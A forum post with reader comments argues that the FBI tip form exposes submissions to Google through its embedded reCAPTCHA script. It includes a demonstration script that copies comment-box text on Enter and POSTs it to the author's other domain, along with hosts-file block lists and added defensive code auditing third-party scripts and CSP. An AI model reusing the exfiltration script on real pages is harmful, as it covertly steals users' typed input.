FBI leaks all tips online to Google, endangering anyone who submits a tip

By Patrick, 2018 Feb 2, 9:27am (932 views, 14 comments)


Summary: our government agencies at both the state and federal level are irresponsibly giving Google access to what should be citizens' private information.

The FBI has a form for reporting tips, here:

https://tips.fbi.gov/

Unfortunately, that FBI form includes a recaptcha from Google, which is used to prove you are a human being and not a robot. It looks like this:

[screenshot of the Google reCAPTCHA widget on the tip form]

You can verify that the FBI tip site is loading the recaptcha script from Google and not from its own servers by doing a "view source" in your browser on the tips.fbi.gov page and seeing this:

src="https://www.google.com/recaptcha/api/challenge?k=6LfDkLwSAAAAAD4IfxM2UpXo_jrotbWHVPWLwZVN&hl=en"
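That view-source check can be automated. The following is an added example, not code from the post and not anything taken from the FBI site: a Node.js script that pulls every script, iframe and image src out of a page's HTML and reports which ones come from an origin other than the page's own. The sample HTML it runs on is constructed here; the recaptcha line reproduces the tag above, while the analytics and tracker lines are invented to exercise the classifier and were not observed on tips.fbi.gov.

```javascript
// Added example: enumerate the external resources a page loads and classify each
// as first- or third-party relative to the page's own origin. Runs offline on a
// constructed sample; only the recaptcha line mirrors what tips.fbi.gov served.

const PAGE_URL = 'https://tips.fbi.gov/';

const SAMPLE_HTML = `
<html><head>
<script src="/js/form.js"></script>
<script>/* inline script, no src: same-origin by definition */</script>
<script src="https://www.google.com/recaptcha/api/challenge?k=6LfDkLwSAAAAAD4IfxM2UpXo_jrotbWHVPWLwZVN&amp;hl=en"></script>
<script async src='//www.google-analytics.com/analytics.js'></script>
<link rel="stylesheet" href="/css/site.css">
</head><body>
<iframe src="https://www.google.com/recaptcha/api2/anchor?k=test"></iframe>
<img src="https://tracker.example/pixel.gif?page=tips">
<img src="data:image/gif;base64,R0lGODlhAQABAAAAACw=">
</body></html>`;

// What a resource of each kind can do once the browser loads it into the page.
const ACCESS = {
  script: 'runs in the page: can read every form field and keystroke',
  iframe: 'separate document: sees your IP, its own cookies and the referrer',
  img:    'sees your IP, its own cookies and the referrer only',
};

// <script|iframe|img ... src="..."> in any quoting style; "\ssrc" avoids data-src etc.
const SRC_TAG_RE = /<(script|iframe|img)\b[^>]*?\ssrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;

function externalResources(html, pageUrl) {
  const page = new URL(pageUrl);
  const found = [];
  for (const m of html.matchAll(SRC_TAG_RE)) {
    const raw = (m[2] || m[3] || m[4] || '').replace(/&amp;/g, '&');
    let url;
    try { url = new URL(raw, page); } catch (e) { continue; }           // unparsable src
    if (url.protocol !== 'http:' && url.protocol !== 'https:') continue; // data:, blob:, ...
    const tag = m[1].toLowerCase();
    found.push({
      tag,
      url: url.href,
      origin: url.origin,
      thirdParty: url.origin !== page.origin,
      access: ACCESS[tag],
    });
  }
  return found;
}

function thirdPartyOrigins(html, pageUrl) {
  const origins = externalResources(html, pageUrl).filter(r => r.thirdParty).map(r => r.origin);
  return [...new Set(origins)].sort();
}

// Third-party scripts are the ones that matter most: they execute with the
// page's full privileges, so anything typed into the form is theirs to read.
function thirdPartyScripts(html, pageUrl) {
  return externalResources(html, pageUrl)
    .filter(r => r.thirdParty && r.tag === 'script')
    .map(r => r.url);
}

for (const r of externalResources(SAMPLE_HTML, PAGE_URL)) {
  const label = r.thirdParty ? 'THIRD-PARTY' : 'first-party';
  console.log(`${label.padEnd(11)} ${r.tag.padEnd(6)} ${r.url}\n            ${r.access}`);
}
```

Swap SAMPLE_HTML for the real source (for instance the output of curl -s https://tips.fbi.gov/) to audit a live page. Scripts are the entries to worry about: a script src from another origin executes with the same rights as the site's own code, whereas an iframe or image from another origin only learns that you loaded it.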

Including that script gives Google the easy ability to capture all the tip data that anyone submits to the FBI. A script loaded into a page runs with that page's full privileges: it can read every form field and every keystroke and send them wherever it likes, and nothing in the browser prevents a site's own chosen scripts from doing so. In addition to the tip itself, the data exposed this way includes:

Your First Name
Your Last Name
Your Middle Name
Your Phone
Your Email
Your Street 1
Your Street 2
Your Suite/Apt/Mail Stop
Your City
Your State

Even if you lie on the form about those things, it's not hard for Google to know who you really are. The request that fetches the recaptcha script goes to google.com and, unless your browser blocks third-party cookies, carries whatever google.com cookies your browser already holds, so if you are signed in to a Google account the visit is tied to it directly; failing that, your IP address and your browser's make and version narrow it down. Google most likely has an extensive profile of you already from your phone usage (if you have an Android phone) and from your searching and surfing habits online.

This is extremely bad for the privacy of people submitting tips to the FBI and could put their lives in danger.

To illustrate the danger, I wrote this little script:


document.addEventListener("DOMContentLoaded", function(event) {
  // Path of this page's own comment-submission endpoint, taken from the accept link
  var path = document.getElementById('accept_comment').getAttribute('href')
  var textarea = document.querySelector('textarea')
  textarea.onkeyup = function(evt) {
    if (evt.keyCode == 13) { // return key
      console.log('sending fbi tip back to evil spying company, ha ha ha!')
      // Cross-origin POST to another site. 'no-cors' makes the response opaque to
      // this script, but the request, and the comment text in its body, still goes out.
      // encodeURIComponent (not encodeURI) so that '&' or '=' in the comment cannot
      // split the form field.
      fetch('https://sftech.fun' + path, {
        method: 'POST',
        mode: 'no-cors',
        body: 'comment_post_id=1275699&comment_content=' + encodeURIComponent(textarea.value)
      })
    }
  }
})


Then I included it on this very page (do a 'view source' and look for spy_on_fbi.js) in just the same way that the FBI includes Google's recaptcha. My little script will spy on every comment entered on this page, and copy it over to a page on a different website of mine, at http://sftech.fun/post/1275699. It won't even wait until you submit a comment, but will copy over what you're writing in the comment box at the bottom of this page every time you hit the enter key.

(Note added Tue 20 Mar 2018: disabled the spying for now, since I took down sftech.fun to save money - still happy to illustrate the principle to interested reporters though. Write p@patrick.net )
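What a site that wants to keep the captcha can and cannot do about this comes down to Content-Security-Policy, the browser-side control over where a page's scripts may load from and send data to. The following is an added example, not the post's code and not anything taken from tips.fbi.gov: a simplified CSP source matcher plus a constructed policy for a recaptcha-protected form (the www.google.com and www.gstatic.com entries are assumptions about what the widget needs). It shows that such a policy would stop the spy script above from POSTing to sftech.fun, but cannot stop data flowing to an origin the policy already has to trust, which is the post's point.

```javascript
// Added example: a simplified CSP source matcher. Covers 'self', 'none', '*',
// scheme-only, host, *.wildcard and explicit-port sources; paths, nonces and
// hashes are ignored. The sample policy is an assumption, not the FBI's.

const DEFAULT_PORT = { 'http:': '80', 'https:': '443', 'ws:': '80', 'wss:': '443' };
// Directives that do not fall back to default-src when absent.
const NO_FALLBACK = new Set(['form-action', 'frame-ancestors', 'base-uri', 'report-uri']);

function parseCsp(header) {
  const directives = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) directives.set(tokens[0].toLowerCase(), tokens.slice(1));
  }
  return directives;
}

function effectivePort(u) { return u.port || DEFAULT_PORT[u.protocol] || ''; }

function sourceMatches(source, target, page) {
  const s = source.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return target.origin === page.origin;
  if (s === '*') return true;
  if (s.startsWith("'")) return false;                               // 'unsafe-inline', nonces, hashes
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return target.protocol === s; // scheme-source such as "https:"
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([a-z0-9.-]+)(?::(\d+|\*))?(?:\/.*)?$/.exec(s);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  const wantScheme = scheme ? scheme + ':' : page.protocol;
  // A source with no scheme, or http:, also matches https: targets (upgrade is allowed).
  if (target.protocol !== wantScheme && !(wantScheme === 'http:' && target.protocol === 'https:')) return false;
  if (wildcard ? !target.hostname.endsWith('.' + host) : target.hostname !== host) return false;
  if (port === '*') return true;
  return effectivePort(target) === (port || DEFAULT_PORT[target.protocol] || '');
}

// Would a browser enforcing `header` on `pageUrl` let `directive` reach `targetUrl`?
function cspAllows(header, directive, targetUrl, pageUrl) {
  const page = new URL(pageUrl);
  const target = new URL(targetUrl, page);
  const d = parseCsp(header);
  let sources = d.get(directive);
  if (!sources && !NO_FALLBACK.has(directive)) sources = d.get('default-src');
  if (!sources) return true;                                         // policy is silent: allowed
  return sources.some(s => sourceMatches(s, target, page));
}

// Constructed policy for a tip form that keeps reCAPTCHA (assumed to need script
// and frame access to www.google.com and script access to www.gstatic.com).
const TIP_FORM_CSP = [
  "default-src 'none'",
  "script-src 'self' https://www.google.com https://www.gstatic.com",
  "frame-src https://www.google.com",
  "connect-src 'self'",
  "img-src 'self'",
  "style-src 'self'",
  "form-action 'self'",
].join('; ');

const PAGE = 'https://tips.fbi.gov/';

// Stopped: the spy script's fetch() POST to another site (connect-src governs fetch and sendBeacon).
function exfilByFetchBlocked() {
  return !cspAllows(TIP_FORM_CSP, 'connect-src', 'https://sftech.fun/post/1275699', PAGE);
}
// Stopped: smuggling the text out in an image URL.
function exfilByImageBlocked() {
  return !cspAllows(TIP_FORM_CSP, 'img-src', 'https://sftech.fun/p.gif?c=tip+text', PAGE);
}
// Not stopped: a script tag pointing at an origin the policy already trusts, with the
// form contents in the query string. That is the origin the captcha itself comes from.
function exfilToTrustedOriginAllowed() {
  return cspAllows(TIP_FORM_CSP, 'script-src', 'https://www.google.com/collect?c=tip+text', PAGE);
}

console.log('fetch to sftech.fun blocked:', exfilByFetchBlocked());
console.log('image beacon blocked:      ', exfilByImageBlocked());
console.log('script load to google.com: ', exfilToTrustedOriginAllowed() ? 'allowed' : 'blocked');
```

The lesson for a site operator is the last function: CSP and Subresource Integrity limit what a compromised or rogue script can do with a fourth party, but an origin you load executable code from is trusted by construction, so the only way to keep tip contents away from it is not to load its script on the form page at all (or to move the captcha to a separate page that holds no sensitive fields).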

Please tell reporters about this. Other government agencies are also unwittingly offering great quantities of personal information about you to Google by including Google scripts, such as:

https://www.coveredca.com/
http://www.edd.ca.gov/
https://www.ice.gov/webform/hsi-tip-form (leaking via Google analytics script)
(let me know about others you find)

1   Sniper   2018 Feb 2, 9:32am

Patrick says
So Google knows


I thought Google knows every time you touch your keyboard or touch screen?

Patrick says
This is extremely bad for the privacy of people


Very true!
2   someone else   2018 Feb 2, 9:35am

One way to get a bit of privacy is to add these lines to the /etc/hosts file on your Mac or Linux computer (probably there is some similar file on Windows):


## CUSTOM BLOCKING
127.0.0.1 google.com
127.0.0.1 www.google.com
127.0.0.1 ssl.google-analytics.com
127.0.0.1 google-analytics.com
127.0.0.1 www.google-analytics.com
127.0.0.1 maps.google.com
127.0.0.1 images.google.com
127.0.0.1 facebook.com
127.0.0.1 www.facebook.com
127.0.0.1 staticxx.facebook.com


What that does is direct all use of those Google and Facebook domains to 127.0.0.1, which is simply your own computer, aka "localhost".

You'll quickly discover just how many government sites are sending your info to Google and Facebook by finding that they don't work with those /etc/hosts settings.
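An added example, not part of the comment above. Lines in a hosts file that were pasted together (as in "127.0.0.1 www.google.com 127.0.0.1 ssl.google-analytics.com") still mostly work, because the resolver treats every token after the address as another name for it and the stray 127.0.0.1 just becomes a useless alias, but they are a sign of a paste gone wrong. This Node.js snippet parses a hosts file with the resolver's rules, flags such lines, and checks which of the hosts a recaptcha form loads from are actually covered. The hosts text is constructed from the comment; the gstatic.com path is made up, and www.recaptcha.net is the alternate domain Google offers for the widget.

```javascript
// Added example: parse a hosts file (first token is the address, every later
// token is a name for it), flag addresses pasted in where names belong, and test
// which URLs the blocking entries actually cover. Sample text is constructed.

const HOSTS_SAMPLE = `
## CUSTOM BLOCKING
127.0.0.1 google.com
127.0.0.1 www.google.com 127.0.0.1 ssl.google-analytics.com
127.0.0.1 google-analytics.com   # inline comments are allowed
0.0.0.0   www.facebook.com
`;

// Addresses that send a name nowhere useful.
const BLACKHOLES = new Set(['127.0.0.1', '0.0.0.0', '::1', '::']);

function looksLikeAddress(token) {
  return /^(\d{1,3}\.){3}\d{1,3}$/.test(token) || token.includes(':');
}

function parseHosts(text) {
  const map = new Map();      // hostname -> address
  const warnings = [];
  text.split(/\r?\n/).forEach((line, i) => {
    const tokens = line.replace(/#.*$/, '').trim().split(/\s+/).filter(Boolean);
    if (tokens.length < 2) return;                   // blank, comment, or address with no names
    const [address, ...names] = tokens;
    for (const name of names) {
      if (looksLikeAddress(name)) {
        warnings.push(`line ${i + 1}: "${name}" is an address where a hostname was expected (two entries on one line?)`);
        continue;
      }
      map.set(name.toLowerCase(), address);
    }
  });
  return { map, warnings };
}

// True when the URL's host is mapped to a blackhole address by the file.
function blockedBy(map, url) {
  const host = new URL(url).hostname.toLowerCase();
  return BLACKHOLES.has(map.get(host));
}

// hosts has no wildcards: an entry for google.com says nothing about www.google.com
// or any other subdomain, so list the hosts a page needs that the file leaves alone.
function uncoveredHosts(map, urls) {
  const hosts = urls.map(u => new URL(u).hostname.toLowerCase()).filter(h => !map.has(h));
  return [...new Set(hosts)];
}

// Constructed list of what a recaptcha-protected page pulls in (paths are illustrative).
const RECAPTCHA_LOADS = [
  'https://www.google.com/recaptcha/api/challenge?k=6LfDkLwSAAAAAD4IfxM2UpXo_jrotbWHVPWLwZVN&hl=en',
  'https://www.gstatic.com/recaptcha/releases/test/recaptcha__en.js',
  'https://www.recaptcha.net/recaptcha/api.js',
  'https://ssl.google-analytics.com/ga.js',
];

const parsed = parseHosts(HOSTS_SAMPLE);
for (const w of parsed.warnings) console.log('warning:', w);
for (const u of RECAPTCHA_LOADS) console.log(blockedBy(parsed.map, u) ? 'blocked  ' : 'allowed  ', u);
console.log('not covered by the file:', uncoveredHosts(parsed.map, RECAPTCHA_LOADS).join(', '));
```

The uncoveredHosts result is the practical catch: every subdomain has to be listed by hand, and a page that can reach the same widget through a host you did not list is not blocked at all. The other catch is the one the comment itself makes: a form whose captcha script is blackholed simply stops working, so this protects you from the leak only by keeping you from submitting.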
3   anonymous   2018 Feb 2, 1:34pm

You think that's bad, I can't log into patrick.net from my job, as google would find out where I work. I used a gmail account when you implemented the new login system as I didn't realize I'd have to authenticate all the hosts that I use to access this forum.
4   Patrick   2018 Feb 2, 1:47pm

You can just comment anonymously, like you did just now. No account required.

I don't use Google Recaptchas, or any Google software, but YouTube videos embedded in posts or comments do come from Google because they own YouTube.
5   Patrick   2018 Feb 2, 1:58pm

Please upvote this very story on HackerNews: https://news.ycombinator.com/item?id=16294534
6   WookieMan   2018 Feb 2, 2:01pm

Patrick says
Please upvote this very story on HackerNews: https://news.ycombinator.com/item?id=16294534


Not sure if it's something on my end. Site loads, but no content or story.
7   Patrick   2018 Feb 2, 2:16pm

Hmmm, interesting. I can see it when logged in to hackernews, but not in incognito mode. Not even when I search for it:

https://hn.algolia.com/?query=fbi&sort=byDate&prefix=false&page=0&dateRange=last24h&type=story

Maybe it has to pass some censor first?

Also please upvote this:

https://www.reddit.com/r/government/comments/7uv0ry/if_you_submit_a_tip_to_the_fbi_google_knows_about/
8   Patrick   2018 Feb 27, 9:18pm

I updated this post to illustrate just how irresponsible the FBI is being. Now every time you hit enter in this comment box, the comment will be copied over to http://sftech.fun/post/1275699
9   anonymous   2018 Feb 28, 12:55am

FYI there is a windows HOSTS file, you should start with this one: http://winhelp2002.mvps.org/hosts.htm
10   anonymous   2018 Feb 28, 6:39am

WOW, I really love what you did with this post Patrick. I am smarter having read this. great job.
11   bob2356   2018 Feb 28, 10:25am

Patrick says
One way to get a bit of privacy is to add these lines to the /etc/hosts file on your Mac or Linux computer (probably there is some similar file on Windows):


## CUSTOM BLOCKING
127.0.0.1 google.com
127.0.0.1 www.google.com
127.0.0.1 ssl.google-analytics.com
127.0.0.1 google-analytics.com
127.0.0.1 www.google-analytics.com
127.0.0.1 maps.google.com
127.0.0.1 images.google.com
127.0.0.1 facebook.com
127.0.0.1 www.facebook.com
127.0.0.1 staticxx.facebook.com


You can look at web sites like http://someonewhocares.org/hosts/ that provide hosts files that block all kinds of nasties like adware. My hosts file runs something like 20 pages.
12   Hircus   2018 Feb 28, 1:47pm

I agree, google could modify their code to harvest said information, but they currently don't.

But, I'm not sure this is any more dangerous than using a computer period. If you use windows/linux/mac, on any day a software update can come in that will start harvesting everything you type, and send it back to their mothership. Same goes for every web browser - they can easily capture everything you do.

Whether it be adding such capturing code to recaptcha, the OS, or a browser, they would probably get away with it for a while until someone notices and sounds the alarm. But, the repercussions would be grave for any big US company like Google/Microsoft.

btw - for those who aren't software developers: most of the web includes code that is loaded from other websites (it's usually related to advertising, analytics, social media, and content sharing). They all have the power to do this - go rogue (delivering an on-the-fly software update that you have no clue occurred) and start harvesting everything you type and/or see on that page. Your anti-virus won't help. The state of web security is a sad one, but it's reality.
13   Patrick   2018 Feb 28, 2:32pm

goat says
I agree, google could modify their code to harvest said information, but they currently don't.


What makes you sure that they don't?

They have the means, the motive, and the opportunity.
14   HEYYOU   2018 Feb 28, 3:00pm

Google invading one's privacy?
As intended by all the worshipers of their GOD, Technology.
Their motto: "Bitch & moan & do nothing!"

Everyone knows there is nothing all the internet users can do.

Hypocrisyism,Stupidism, Retardism is damn entertaining.
Get those snowflakes a crying towel.



